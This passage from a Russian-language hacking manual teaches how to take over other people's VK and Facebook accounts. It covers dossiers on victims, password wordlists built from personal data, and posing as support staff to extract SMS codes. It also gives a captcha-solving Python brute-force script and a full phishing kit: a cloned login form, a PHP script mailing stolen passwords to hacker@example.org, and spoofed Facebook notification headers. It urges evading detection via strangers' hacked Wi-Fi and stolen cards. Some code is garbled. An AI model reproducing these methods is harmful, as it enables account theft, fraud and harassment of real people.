• Конкуренция или промышленный шпионаж – иногда нужно взломать бизнес-аккаунт конкурента для получения нужной информации, например настройки рекламной кампании, переписка с клиентами и т.д. В некоторых случаях бизнес-аккаунт взломать даже проще. Помни, что редко когда бизнес-аккаунтом пользуется один владелец, часто он предоставляет доступ к нему своим сотрудникам. А когда доступ имеют, скажем, 5-7 человек, то твои возможности расширяются. Не получилось взломать один аккаунт, можешь пробовать взломать другой. Человеческая глупость или тупость не знает границ. Недавно одному из авторов этой книги было поручено проверить безопасность одного из предприятий, в том числе проверялся и бизнес-аккаунт на Facebook. Доступ к аккаунту был у пяти человек, в том числе у девушки Златы. Пароль к личному аккаунту Златы был Zlata<Homep\_телефона>, причем номер телефона был в открытом доступе на страничке Златы. Занавес...

## 8.2. Сбор информации

Существуют различные методы взлома. Вообще, взлом социальной сети – небыстрое дело. Быстро только котята родятся и аккаунты взламывают хакеры в фильмах. Нужно запастись терпением, чтобы довести начатое до конца.

Не существует универсального метода взлома аккаунта. Прежде, чем приступить к взлому, ты должен собрать как можно больше информации о своей жертве. Чем больше информации ты соберешь, тем проще будет взломать пароль. Собирай всевозможную информацию и веди досье:

- Полные ФИО.
- Дата и место рождения.
- Место проживания.
- Социальный статус.
- Место работы и должность.
- E-mail, номер телефона.
- Девичья фамилию для женщин.
- Любимые блюда, клички домашних животных, если они есть.

• Любимые цветы, увлечения, хобби и т.д.

Также будет неплохо добавиться в друзья к некоторым друзьям жертвы, а затем добавиться в друзья к самой жертве. Этим ты не вызовешь подозрения (жертва увидит, что ты являешься общим знакомым, возможно, она где-то тебя видели (ясное дело, не тебя, а ту фейковую фотку, которую ты поставишь в фейковый аккаунт), и не захочет отказываться в добавлении в друзья, тем более, что есть общие знакомые). В результате ты получишь доступ к информации, которая открыта только для друзей – некоторым фото, по которым можно понять, где бывает жертва; номеру телефона; e-mail и т.д.

Номер телефона и e-mail тебе понадобятся для отправки фейковых сообщений якобы от социальной сети. Если на социальной страничке их нет, тебе придется их вычислить. Соберите как можно больше аккаунтов, которыми пользуется твоя жертва, – Facebook, VK, Instagram, Twitter и т.д. Поочередно попробуйте восстановить пароль в каждом из этих аккаунтов. При восстановлении пароля сообщение может быть отправлено или на e-mail, или на телефон, если он привязан к аккаунту. Каждый из этих сервисов закрывает звездочками свою часть номера. Например, попытайся восстановить пароль на VK – ты получишь одну часть номера телефона. Затем, если почта у жертвы на Mail.Ru, попытайся восстановить доступ к почте – ты получишь вторую часть номера. Если не будет хватать нескольких символов, не проблема, можно перебрать, вариантов то всего 10 для каждого знакоместа. Конечно, если не хватает двух цифр, то вариантов уже 100.

Почту можно вычислить в коде страницы. Например, если жертва пользуется социальной сетью Мой мир, то ее электронная почта есть в коде страницы профиля или даже в URL. Можно использовать социальный инжинириг – познакомиться с жертвой, общаться несколько дней, чтобы не вызывать подозрения, затем попросить e-mail, чтобы отправить якобы интересующую жертву информацию. Вуаля – почта есть. Правда, жертва может использовать для социальной сети и личной переписки разные ящики – это усложнит задачу. Аналогичным образом, впрочем, можно добыть и номер телефона.

Также выясни все клички животных – которые были и которые есть. Очень часто кличка животного является частью пароля или самим паролем. То же самое можно сказать и о детях. Если у жертвы есть дети, выясни, как их зовут. Очень часто паролем является имя ребенка. Причем если есть девочка и мальчик, то, скорее всего, паролем будет имя девочки (возможно, с какимито цифрами, например, годом или датой рождения, например, Vika201012). Хобби или увлечения – еще одно слабое место. Например, если жертва – фанат Audi, то паролем может быть слово Audi с какими-то цифрами, например:

- AudiQ7 марка и модель машины.
- Audi798 марка и часть номера.
- Audi\_197\_798 марка и номер авто.

Да, номер автомобиля тоже желательно узнать – он может быть частью пароля. Номер, как правило, легко узнать по фотографиям, которые жертва выкладывает в социальной сети.

Из всех этих данных собери словарь возможных паролей. Пусть жертву зовут Андрей Иванов, он родился 14.03.1977 года, имеет аккаунт в Facebook /iandrey1403, увлекается автомобилями, в частности Audi, владеет автомобилем с номером 798 регион 197 (номер вымышлен), также имеет дочь Викторию, которая родилась 20 октября 2012 года. Номер телефона жертвы 4952223344 (номер вымышлен).

Соберем список возможных паролей (это не все пароли, которые можно собрать на основе этих данных, просто чтобы ты понимал, как сформировать подобный словарь):

// Блок Хобби Audi798 AudiQ7 AudiQ7_798 Audi_798 Audi_197798 Audi_798197 AudiQ7_798197 Audi798197 Audi798197			
audi798 audiq7 audiq7_798 audi_798 audi_197798 audi_798197 audiq7_798197 audi798197 audi798197			
// Блок личные данные Andrev77 andrey140377 140377 14031977 Andrev140377 Andrey14031977 ivanov140377 ivanov140377 4952223344 // Дети и животные Vika201012 vika201012 Vika20102012 vika20102012 Vika2012 vika2012 // Другие аккаунты iandrey1403 iandrev140377 iandrey14031977

// Разный бред вроде: 123456789qwerty qwerty1234567890000

Подобный список должен содержать не менее 100 различных вариантов пароля. Скорее всего, подобных вариантов будет больше, если ты соберешь всю необходимую информацию. Затем эти пароли можно будет или попробовать ввести вручную, или же автоматизировать этот процесс. Брутфорсить (то есть подбирать пароли путем перестановки символов) нет особого смысла, так как после определенного количества попыток аккаунт блокируется на некоторое время, поэтому брутфорсинг может длиться вечно и не факт, что приведет к правильному паролю. Представим, что у жертвы был случайный пароль BM820A. Пока программа дойдет до этой комбинации символов, может пройти несколько месяцев с учетом блокировок аккаунта. Разумеется, социальная сеть будет предупреждать, что пароль пытаются взломать. Жертва сменит его на Aa810Q. Программа такой пароль уже использовала месяц назад, и он не подошел. Следовательно, при брутфорсинге есть вероятность вообще не получить пароль. А словари на основе личной информации позволяют угодить точно в цель и сократить время получения доступа от нескольких дней до нескольких часов. Пусть какая-то социальная сеть после 5 неправильных попыток блокирует аккаунт на час. Следовательно, за один час ты можешь ввести только 5 паролей. В твоем списке есть 100 паролей. Время взлома – 20 часов. Через 20 часов вы или получите доступ к аккаунту, или же поймете, что ваш словарь паролей неполный.

#### Внимание! Двухфакторная авторизация.

Фишкой последних лет стала двухфакторная авторизация. Когда социальная сеть видит, что пользователь пытается войти с другого устройства, она отправляет код на его номер телефона в SMS. Здесь важно запастись номером жертвы. Если такое произойдет, ты должен моментально отправить сообщение жертве "Для предотвращения нежелательного доступа к аккаунту отправьте код, полученный из предыдущего SMS" или что-то в подобном духе. Жертва в "запарке" может взять да и отправить код, который социальная сеть прислала ей для входа в аккаунт! Конечно, жертва может догадаться и ничего не отправить – такое тоже может произойти, и тебе придется искать другие методы взлома. Также нужно отметить, что далеко не все пользователи включают двухфакторную авторизацию – многие даже не понимают, что это такое!

## 8.3. Методы взлома

## 8.3.1. Взлом электронной почты

В главе 3 мы приводили методы взлома электронного ящика. Если ты их с успехом освоил, можешь использовать их для получения доступа к электронному ящику пользователя. Как только ты завладел почтовым ящиком, ты можешь "восстановить" пароль к аккаунту социальной сети. В общем, дело техники. Недостаток этого метода в том, что жертва узнает, что пароль для странички был сменен. Но опять-таки все зависит от цели взлома, если это не бытовой взлом, когда нужно сохранить пароль, то тебе должно быть все равно.

## 8.3.2. Социальный инжиниринг

Методы социального инжиниринга также могут пригодится. Правда, в последнее время они не такие эффективные, как раньше, поскольку люди стали более образованными в IT-плане и менее доверчивыми. Однако такой метод может сработать. Особенно он хорошо работает с новичками – или с детьми или со стариками. Создай какой-то фейковый аккаунт, а еще лучше позвони (анонимно, через SIP) и представься представителем службы поддержки. Далее нужно выведать у жертвы всю необходимую тебе информацию. Можно действовать наверняка и сказать, что осуществляется взлом его странички. Звоните, представляетесь специалистом техподдержки ВКонтакте Романом (ну или любым другим именем, которое вам больше нравится), уточняете ФИО (оно есть в анкете, как, часто и номер телефона) и сообщаете, что вашу страничку пытаются взломать. Сами тем временем пытаетесь войти на страничку пользователя, точнее восстановить его пароль. Сообщаете жертве, что сейчас на его номер телефона придет SMS и нужно продиктовать код, чтобы техподдержка могла убедиться в том, что пользователем является именно он, и чтобы отсечь все попытки хакеров взломать аккаунт. Жертва сообщает код, дальше дело техники. Главное, чтобы ты позвонил раньше, чем придет код.

Поэтому сначала звоним, устанавливаем контакт, а затем – инициируем восстановления пароля. С некоторыми пользователями это легко сработает, и на все про все ты потратишь 5-10 минут. Это может существенно ускорить взлом по сравнению с другими методами, где придется неделями заниматься "окучиванием" аккаунта жертвы.

## 8.3.3. Перебор пароля

Как уже было отмечено ранее, различные утилиты для грубой силы (bruteforce) нет смысла использовать с социальными сетями, учитывая блокировку аккаунта после определенного количества неправильных попыток ввода пароля. Лучше всего использовать точечные словари, составленные на основе личных данных.

Пароли можно вводить вручную – их не так много – или же автоматизировать этот процесс. Всевозможные скрипты для этого вы можете найти в Интернете. Приводим пример (лист. 8.1) скрипта, написанного на Python. Скрипт автоматизирует перебор паролей через мобильную версию ВКонтакте.

.....

#### Листинг 8.1. Перебор пароля через мобильную версию ВКонтакте

```
#! coding: utf8
import grab, re, urllib2
from antigate import AntiGate
from grab import GrabTimeoutError
from time import sleep
cap key = '123 ' #Ваш ключ с Antigate
def anti(key, file): #Получение решения Captcha с Antigate
    try:
        try:
            data = AntiGate(key, file)
            return data
        except KeyboardInterrupt:
           print ("Завершение")
    except:
        anti(key, file)
def save(url, file):
                                #Скачивание файла по URL
    site = urllib2.urlopen(url)
    f = open(file, 'wb')
    f.write(site.read())
def cap solve(img):
    save(img, 'captcha.jpg')
    key = anti(cap key, 'captcha.jpg')
    return key
def brute(login, passwords, save):
    out = open(save, 'w')
    psswrds = open(passwords, 'r')
    try:
       int (login)
        prefix = True
    except:
       prefix = False
    q = qrab.Grab()
    g.go('http://m.vk.com')
    for line in psswrds:
        psswrd = line.rstrip('\r\n')
```

```
g.doc.set input('email', login)
        q.doc.set input('pass', psswrd)
        q.doc.submit()
        if g.doc.text search(u'captcha'):
            all captchas = re.findall('"(/captcha.php[^"]*)"',
g.response.body) [0]
            captcha = '' + all captchas
            key = cap solve(captcha)
            g.doc.set input ('email', login)
            g.doc.set input ('pass', psswrd)
            g.doc.set input('captcha key', str(key))
            g.doc.submit()
            print("cap")
            if 'Подтвердить' in g.response.body:
                if prefix:
                     prefix1 = q.doc.rex search('+[0-9]*').qroup(0)
                     prefix2 = g.doc.rex search(' [0-9]*').group(0)
                     pre1 = re.findall('[0-9]{1,}', prefix1)[0]
                     pre2 = re.findall('[0-9]{1,}', prefix2)[0]
                     login = login.replace(prel, '')
                     login = login.replace(pre2,
                                                  ")
                     g.set input('code', login)
                     q.submit()
                     print(login + ':' + psswrd + '--success')
                     out.write(login + ':' + psswrd + '\n')
                 else:
                     out.write(login + ':' + psswrd + '\n')
            else:
                 if q.doc.rex search('[^>]+').group(0) = 'Login | VK':
                     print(login + ':' + psswrd + '--fail')
                 else:
                     print(login + ':' + psswrd + '--success')
                     out.write(login + ':' + psswrd + '\n')
    out.close()
    psswrds.close()
```

Да, этот скрипт далек от идеала, но при желании ты его можешь доработать. В нем хорошо то, что он будет сам вводить капчу с помощью Antigate, а капча будет появляться, поскольку ты входишь в систему из другой страны. Примечание. Надеюсь, ты догадался использовать все меры предосторожности? Используй меры из главы 5 для обеспечения анонимности. Как минимум, не взламывай аккаунты со своего домашнего Интернета, купи SIM-карту и смени свою локацию. Используй VPN или Tor. Если карточку купить не получается, взломай чей-то Wi-Fi – это неплохой шанс остаться незамеченным. Но не забывай о предосторожности. Если не хочешь использовать VPN (или социальная сеть блокирует доступ из VPN/Tor), взломай чей-то Wi-Fi (только не соседский, а желательно в другом доме) и используй на своем компе для работы виртуальную машину, которую ты удалишь, как только цель будет достигнута. Чтобы на твоем компе не остались данные, которые могли бы доказать, что взламывал именно ты. А так Autopsy – довольно мощный инструмент и может накопать о тебе больше инфы, чем ты сам о себе знаешь!

Данный метод позволяет войти на страничку без смены пароля, то есть подойдет в случае, если тебе нужно, чтобы жертва не догадывалась о взломе страницы.

## 8.3.4. Фишинг, или фейковая страничка. Очень подробное руководство

Фишинг – один из самых распространенных методов взлома страниц в социальных сетях. Например, хакер может просто создать идентичную по структуре и дизайну страницу, на которой сайт запрашивает логин и пароль жертвы. Когда жертва его вводит, логин и пароль отправляются хакеру.

Примечание. Fishing происходит от fish – рыба. В свою очередь, этот метод подразумевает "ловлю на крючок". Попадется жертва или нет – зависит от опытности рыбака и смекалки рыбы.

Хоть и сейчас многие пользователи уже достаточно грамотные и могут отличить адрес фишингового сайта от реального, не стоит забывать, что есть новички, которые, увидев схожий дизайн, начинают слепо доверять сайту.

Как реализовать:

- 1. Зарегистрируй домен вроде vk-login.com, facebook-login.com, fb-login. сот или как-то так, чтобы было похоже на адрес соцсети. Регистрацию нужно производить на фейковый е-mail, оплачивать биткоинами или украденной кредиткой.
- Купи какой-то дешевый хостинг, не в России, прикрути домен к этому хостингу. Купи самый дешевый SSL-сертификат, чтобы браузер не ругался на его отсутствие. Так у тебя ничего не получится еще в самом начале! Хостинг должен быть с поддержкой PHP – это обязательное условие.
- 3. Используя команду Сохранить как в браузере, сохрани страничку входа в социальную сеть вместе с картинками.
- 4. Отредактируй HTML-код так, чтобы введенные имя пользователя и пароль отправлялись тебе на электронную почту, сценарий будет приведен.
- 5. При желании можно сделать редирект на социальную сеть, чтобы жертва ничего не заподозрила. Так как жертва, скорее всего, уже залогинена в социальной сети, достаточно будет сделать редирект на главную страницу – жертва ничего не поймет, и ей не придется вводить пароль дважды.
- 6. Осталось только заманить жертву на фейковую страничку. Можно отправить ей сообщение о необходимости актуализации персональных данных, просмотре какого-то интересного контента и т.д. В общем, прояви фантазию. Вся проделанная до этого техническая работа зависит от того, насколько ты постараешься на последнем этапе. Facebook, например, регулярно спамит на почтовый ящик мол, посмотрите, кто заходил на твою страницу, кто оставил мнение о твоей странице, отправляет различные напоминалки о днях рождения и т.д. Если ты пользуешься этой сетью, то наверняка видел подобные сообщения. Отправь пользователю такое же сообщение, с таким же дизайном. В таких сообщениях, как правило, есть кнопка со ссылкой, например, ссылка ведет на мессенджер, чтобы поздравить пользователя с днем рождения. Ты вставляешь ссылку, которая введет на твой фейковый домен fb-login.com. Жертва переходит по ней и видит окно входа в социальную сеть. Если жертва переходит с мобильного телефона, она вовсе может ничего не заподозрить.

Теперь поговорим о технической части на примере ВКонтакте (все-таки это одна из самых популярных, если не самая популярная сеть на наших просторах). На рис. 8.1 показана страница входа в социальную сеть. Щелкни правой кнопкой мыши и выбери команду Сохранить как. Сохрани страницу как index.html, при сохранении выбери Страница (полностью), как показано на рис. 8.2.



Рис. 8.1. Страница входа на сайт ВКонтакте



Рис. 8.2. Сохранение страницы с сайта ВКонтакте

Сохранять страничку нужно в отдельный каталог, специально созданный для этих целей (у нас это C:\vk).

На рис. 8.3 показано содержимое этого каталога после сохранения странички. Все довольно лаконично.



Рис. 8.3. Страничка сохранена

Опубликуй содержимое каталога C:\vk на своем хостинге. Нужно скопировать содержимое, а не весь каталог – файл index.html и nanky index\_files. Попытайся открыть свой сайт. Ты увидишь примерно следующее (рис. 8.4).

Вместо русских символов – какая-то абракадабра. Явно не та страница, на которую можно заманить пользователя. Но обрати внимания – она в дизайне ВКонтакте. Так что приступаем ко второму этапу.

0	A Directory and the state of th	9 X
	x 2 📾 🛦 👘 Interative	
10	Martin Contraction and Contraction Contraction Contraction Contraction Contraction Contraction Contraction Contraction	Switch to English
0 8 9 8 8		
	++++++++++++++++++++++++++++++++++++++	
	00000000 0000000000 000000000000000000	
	B 19 666 Annual B 19 666 Annual December 2006 B Annual December 2006	

Рис. 8.4. Абракадабра

Тебе понадобится текстовый редактор Notepad2 (бесплатно можно скачать по адресу https://www.flos-freeware.ch/). Открой index.html в этом редакторе и выбери команду **File, Encoding, UTF-8**. Затем измени кодировку windows-1251 на utf-8, нужная правка выделена на рис. 8.5.

workstore (Crist) - Notes and     -
File Edit yber Semina 1
INDUIO I ANDALINA NOME
retter 194 Mals Schell Law ("" alw") tr' style", style", style (" style", style", style (style) (" des tilsts best, et () as any tr' style (style (style)) (style (
r oarta http-eoria-15-00-conpatible" content="III-edge"> a clinis rela-Shortine Izan" trefa-Pittgs://w.com/happe//com/faricees/fax_loga.iko/bl">
e d tae 're's"apple-taech-icae' hrets "https://www.cael/auges/icaea.jaacle/default.gooj?#'s
инився плони"безстартног социна "вконтале - унинослание средство дне общник и ноиска дудин и одногнассников, которан онадовно пользуются десятки наложнов человак. Нь котон тоби дузак, однолурсники, одноствасники, соседи и котоги всятая оставляется в контакте. "
an etitle-dofpe newannears   Brownare-Citites
U-mescripta-waita http:mmiv="refresh" caltent="0; uBL=/badbrokser.php">
***/ Inits type="text/css" col_sto_lesiest" init_"/idea_files/comen_sadB3028335454.css"+closk_type="text/css" rol_"typlestert" http://text/sds.312508affee070934.css" >>> init_see="text/css" col_sto_lesiont" init_"/idea_files/col_sto_lesionts.ctf.3474663372808482.css"+closk_type="text/css" rol_"typlesteet" http:// *_idea_filesiont_col_rcs124824864666655**
<pre>inscriptions.flip.ids.flip.ids.jp.map.exe"_contact@initial_managemeth/c/criptionscripting_entry/initial_initianitianitianitianitianitianitianit</pre>
s floet to equate dimension - function() s finite dimension - function() s floet dimension - function() s floet dimension - function() s floet dimension - for the the the floet dimension - for the
n tara domini a fonomi historia historia di decument contenti a fonomi historia di la contenti a di la contenti a di la contenti a di la contenti a di di la contenti di la contenti di la contenti a di di la contenti di la contenti di la contenti a di la contenti di la contenti di la contenti di la contenti di di la contenti di la di la contenti di co
16) w function checkblaroser() { w function.body) [ w function(checkblaroser());
in returns
In 2: 514 Cal 39: Sei 67 657 657 657 657 657 665 Web Source Crase

Рис. 8.5. Редактируем index.html

Сохрани файл и опять залей его по FTP на свой сайт. Открой страничку заново. Теперь с кодировкой все хорошо (рис. 8.5). Если ты очень внимательный, то наверняка заметил, что не хватает изображения смартфона. Но об этом знаешь только ты, и не все пользователи знают, как должна выглядеть страничка входа. При желании ты можешь сделать скриншот страницы и на место объекта-смартфона вставить полученный скришот. Для этого тебе понадобятся знания HTML и работы в графическом редакторе Paint. В общем, основы основ. Мы этого делать не будем, так как считаем, что страница сгодится и так.



Рис. 8.6. Проблемы с кодировкой нет

Опять вернись в текстовый редактор. Сейчас у нас будет более важная задача. Нужно найти форму входа и изменить ее так, чтобы она передавала данные не сайту ВКонтакте, а твоему сценарию, который будет их принимать и отправлять тебе на e-mail.

Наша форма входа выделена на рис. 8.7. Ее точный листинг приведен в лист. 8.2.



Рис. 8.7. Форма входа ВКонтакте

#### Листинг 8.2. Форма входа ВКонтакте

```
<form method="POST" name="login" id="quick login form"
action="https://login.vk.com/?act=login" target="quick login frame">
    <input type="hidden" name="act" value="login">
    <input type="hidden" name="role" value="al frame">
    <input type="hidden" name="expire" id="quick expire input" value="">
    <input type="hidden" name="to" id="quick login to" value="aW5kZXqucGhw">
    <input type="hidden" name="recaptcha" id="quick recaptcha" value="">
    <input type="hidden" name="captcha sid" id="quick captcha sid" value="">
    <input type="hidden" name="captcha key" id="quick captcha key" value="">
    <input type="hidden" name="_origin" value="https://vk.com">
    <input type="hidden" name="ip h" value="f90f2623100eec23f2">
    <input type="hidden" name="lq h" value="509361f6908e87c398">
    <input type="hidden" name="ul" id="quick login ul" value="">
    <div class="label">Телефон или email</div>
    <div class="labeled"><input type="text" name="email" class="dark"</pre>
id="quick email"></div>
```

```
<div class="label">Maponb</div>
   <div class="labeled"><input type="password" name="pass" class="dark"
id="quick_pass" onkeyup="toggle(&#39;quick_expire&#39;, !!this.
value);toggle(&#39;quick_forgot&#39;, !this.value)"></div>
   <input type="submit" class="submit">
   </form>
```

Код, на который нужно обратить внимание, выделен жирным:

- https://login.vk.com/?act=login сценарий входа, обрабатывающий введенные логин и пароль. Именно ему данные передает наша форма.
- email это логин (e-mail) пользователя.
- pass а это нароль пользователя.

Итак, нам нужно изменить только сценарий входа на login.php:

<form method="POST" name="login" id="quick\_login\_form" action="login.php" target="quick login frame">

Теперь все данные форма будет отправлять сценарию login.php. Его нужно поместить в тот же каталог, что и наш index.html. Код этого сценария приведен в листинге 8.3.

## Листинг 8.3. Код сценария login.php

```
<?php
// Получаем данные из формы
$email = $_POST['email'];
$login = $_POST['login'];
// разумеется, hacker@example.org меняем на свой адрес электронной почты
mail('hacker@example.org', 'Passwords come', "Login $email Pass $pass");
// Перенаправляем пользователя на главную страничку ВКонтакте
header('Location: https://vk.com');
?>
```

Мы понимаем, что язык программирования PHP ты, скорее всего, не знаешь. Попытаемся разжевать максимально подробно. Первым делом наш сценарий получает данные из формы. Поскольку наша форма использует метод POST (см. method="post" в коде формы), то мы используем массив \$\_POST. Если тебе встретится странная форма, передающая логин и пароль методом GET, то данные нужно искать в массиве \$\_GET.

Далее мы с помощью функции mail() отправляем введенные пользователем значения на свою электронку. Мы не стали морочить голову с заголовками письма, поэтому письмо может попасть в папку Спам. Периодически проверяй ее в поисках пароля. А можешь сам попробовать ввести логин и пароль для проверки формы, найти письмо в папке Спам и пометить его как не спам. В этом случае письма больше не будут попадать в Спам.

Далее, чтобы пользователь ничего не заподозрил, мы перенаправляем его на главную страницу входа в ВК. Собственно, на этом все. Ты получаешь логин и пароль, а пользователь ничего не подозревает, продолжает пользоваться ВК дальше. Метод подходит для случаев, когда не нужно сбрасывать пароль жертвы.

Фишинг – неплохой метод и с технической точки зрения совсем не сложный. Но дьявол кроется в деталях. От того, насколько качественно ты все реализуешь, будет зависеть успех этого мероприятия. Например, в нашем случае:

- Для экономии времени мы не стали публиковать картинку со смартфоном на странице входа. Это косяк. Не то чтобы явный, но некоторые пользователи могут заметить.
- Также мы не использовали сайт с SSL. Обрати внимание возле значка VPN есть значок восклицательного знака. Он говорит о том, что HTTPS не используется. Это тоже прокол. Нужно купить самый дешевый сертификат или прикрутить бесплатный сертификат Let's Encrypt. Конечные инструкции ты узнаешь у хостера, у которого купил хостинг под все это дело.
- Многое зависит от доменного имени, которое ты купишь. Насколько оно будет похоже на имя той сети, страничку в которой ты хочешь взломать. Конечно, глупых пользователей много, и некоторые могут попросту не обратить внимание на адрес, но тебе же не хочется, чтобы пользователь заметил фейк?
- Огромное внимание нужно уделить письму, которое предназначено, чтобы заманить пользователя на фейковую страничку. Подделать его нужно

полностью, до мельчайших подробностей, включая заголовки письма. О том, как подделать заголовки письма, было сказано в главе 3. Например, для Facebook заголовки выглядят так:

```
$headers = 'From: Facebook <notification@facebookmail.com>' ."\r\n" .
    'Reply-to: noreply <noreply@facebookmail.com>' . "\r\n";
```

```
mail($to, $subject, $message, $headers);
```

Примечание. Почему очень важно подделать заголовки? Да потому что некоторые пользователи сортируют сообщения от социальных сетей. Они попадают в определенную папку в интерфейсе почтовой программы. Если письмо попадет в другую папку, то ты прокололся уже в самом начале, так ничего и не начав. С вероятностью 90% можно сказать, что пользователь не перейдет по ссылке в твоем письме.

Код письма, которое отправляет социальная сеть, можно получить при просмотре оригинала сообщения в почтовой программе. Зарегистрируйся в той социальной сети, страничку в которой ты хочешь взломать.

М Исходное	сообщение × +	
$\in \Rightarrow \mathbf{G}$	☆ ■ mail.google.com/mail/u/07ik=cebfc0d9888wiew=om8ipermmsgid=ms.	
	<pre>bi_c011d050d33d0fa639c747bb7ff864f7 Content-Type: text/html; charset="UTF-8" Content-Transfer-Encoding: quoted-printable </pre>	

Рис. 8.8. Просмотр оригинала письма

Открой письмо от социальной сети. Возможно, нужно будет подождать, пока сеть пришлет тебе то письмо, которое подходит для твоей цели. Например, когда кто-то добавится в друзья или когда у твоего друга будет день рождения. Открой оригинал письма. Например, в интерфейсе GMail нужно щелкнуть по троеточии в верхнем правом углу и выбрать команду **Показать оригинал**.

Просто сохрани код письма в HTML-файл. Найди в коде ссылку на социальную сеть и замени на адрес своего сайта. Причем можешь заменить не одну ссылку, а несколько, чтобы с большей вероятностью пользователь попал на твою страничку. Например, когда у друга день рождения, то Facebook отправляет две ссылки – одна ведет на профиль пользователя, другая – на мессенджер, чтобы ты мог отправить другу сообщения. Менять нужно все подобные ссылки, чтобы исключить вариант, что пользователь нажмет какую-то другую, а не нужную тебе.

Затем напишем небольшой скрипт на РНР (лист. 8.4).

#### Листинг 8.4. Скрипт отправки письма в формате HTML



Разберемся, что тут и к чему. Файл с твоим письмом нужно назвать message.html и поместить в один каталог с файлом index.html. Код письма будем хранить отдельно от кода сценария. У PHP сложные правила кодирования текста внутри письма, объяснять которые новичку нет желания. К тому же у него всегда будет возможность накосячить и совершить ошибку, а так ошибка исключена.

Адрес почты hacker@example.org замените своим личным. Ты будешь запускать этот сценарий столько раз, сколько понадобится – пока ты не убедишься, что результат действительно похож на оригинал. Тему письма замените той, что подходит под ваше сообщение. Если это уведомление о дне рождения друга, то будет одна тема, если о чем-то другом, то другая тема.

Заголовки письма тоже замените. Сейчас они приведены для Facebook. ZuckMail [version 1.00] – это название мейлера Facebook. Если ты хакаешь другую соцсеть, посмотри, какой мейлер использует она. Дьявол кроется в деталях – помни об этом. Некоторые почтовые интерфейсы могут из-за таких мелочей поместить твои письма в спам. Чем подробнее ты укажешь заголовки, тем лучше. Разумеется, эти заголовки должны быть максимально похожими на оригинал.

Вот пример заголовков Facebook (это не все заголовки, а те, которые ты можешь проставить, потому что некоторые заголовки могут изменяться только почтовой системой и пользователь никак на них не может повлиять):

```
То: Адрес получателя
Subject: Тема
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
From: Facebook <notification@facebookmail.com>
Reply-to: noreply <noreply@facebookmail.com>
Errors-To: notification@facebookmail.com
X-Facebook-Notify: birthday reminder; mailid=7b5af9acc94d6G5af
38faa1b5aG5b5afe4629ba8G1a
List-Unsubscribe: <https://www.facebook.com/o.php?k=AS0s8tXaU
tE6K1UGr4c&u=100002139085658&mid=5d5af7acc98d6G5af38ffa1b5aG5
b5efe3629ba8G1a&ee=AY3MKGdB2m3JaaJQfq45UgeK7UfE7Vaq5d07dkOiQn
n ULrQ1jmN0U1L nG9uS1kRXSo3 eqpbTeQ>
Feedback-ID: 0:birthday reminder:Facebook
X-FACEBOOK-PRIORITY: 0
X-Auto-Response-Suppress: All
MIME-Version: 1.0
```

Страшные наборы символов вроде 7b5af9acc94d6G5af38faa1b5aG5b5afe-4629ba8G1. – это UUID. Чтобы твое письмо походило на оригинал, тебе нужно сгенерировать какой-то UUID в сценарии отправки сообщения. Здесь можно выбрать два варианта – вручную изменить ID и статически прописать их в заголовках письма. А можно использовать библиотеку PHP для генерирования UUID и автоматизировать этот процесс. Тогда каждое новое письмо, которое ты отправляешь, будет со своим UUID. Для этого используется такой сценарий (.пист. 8.5).

### Листинг 8.5. Сценарий генерирования UUID

```
<?php
require 'vendor/autoload.php';
use Ramsev\Uuid\Uuid;
use Ramsey\Uuid\Exception\UnsatisfiedDependencyException;
try {
   // Версия 1 (основана на времени)
    $uuid1 = Uuid::uuid1();
    echo $uuid1->toString() . "\n"; // i.e. e4eaaaf2-d142-
11e1-b3e4-080027620cdd
    // Версия 2. (на базе названия и MD5)
    $uuid3 = Uuid::uuid3(Uuid::NAMESPACE DNS, 'php.net');
    echo $uuid3->toString() . "\n"; // i.e. 11a38b9a-b3da-
360f-9353-a5a725514269
    // Версия 3 (случайный набор символов)
    $uuid4 = Uuid::uuid4();
    echo $uuid4->toString() . "\n"; // i.e. 25769c6c-d34d-
4bfe-ba98-e0ee856f3e7a
   // Версия 4 (на базе названия и SHA1)
    $uuid5 = Uuid::uuid5(Uuid::NAMESPACE DNS, 'php.net');
    echo $uuid5->toString() . "\n"; // i.e. c4a760a8-dbcf-
5254-a0d9-6a4474bd1b62
} catch (UnsatisfiedDependencyException $e) {
    // В случае ошибки
    // использования 32-битной системы. Или отсутствия библиотеки
Moontoast\Math.
    echo 'Caught exception: ' . $e->getMessage() . "\n";
```

Загрузить саму библиотеку, которая занимается непосредственно генерированием UUID, можно по адресу https://github.com/ramsey/uuid.

Для более удобного формирования заголовков и отправки сообщений в формате HTML можно использовать библиотеку PHPMailer: https://github.com/ PHPMailer/PHPMailer. Данная библиотека позволяет не только просто отправлять сообщения в формате HTML, но и сообщения с вложениями. Возможно, при взломе социальных аккаунтов тебе эта возможность и не понадобится. Но она нужна много где еще. В лист. 8.6 приводится пример отправки сообщения с вложением.

#### Листинг 8.6. Отправка сообщения с вложением

```
<?php
// Подключаем PHPMailer .
use PHPMailer\PHPMailer\PHPMailer;
require '.../vendor/autoload.php';
// Создаем новый экземпляр объекта
$mail = new PHPMailer();
// Устанавливаем заголовок From
$mail->setFrom('from@example.com', 'First_Last');
// Устанавливаем заголовок Reply-to
$mail->addReplyTo('replyto@example.com', 'First Last');
// Добавляем адрес
$mail->addAddress('whoto@example.com', 'John Doe');
// Устанавливаем тему письма
$mail->Subject = 'test';
// Добавляем HTML-код письма
$mail->msgHTML(file get contents('contents.html'), DIR );
// Добавляем обычную текстовую версию письма (необязательно)
$mail->AltBody = 'This is a plain-text message body';
//Добавляем вложение - картинку
$mail->addAttachment('images/phpmailer mini.png');
// Отправляем сообщение и проверяем на наличие ошибок
if (!$mail->send()) {
    echo 'Ошибка: ' . $mail->ErrorInfo;
} else {
    echo 'Письмо отправлено!';
?>
```

## 8.3.5. Клавиатурный шпион

Данный метод, наверное, самый простой со всех. Он заключается в установке клавиатурного шпиона на компьютер жертвы. Клавиатурный шпион – это программа, которая записывает все, что вводит пользователь с клавиатуры, в специальный файл и отправляет хакеру на электронку, например, когда файл достигает определенного размера или по прошествии определенного времени, скажем, раз в день.

Однако, у этого способа куча недостатков:

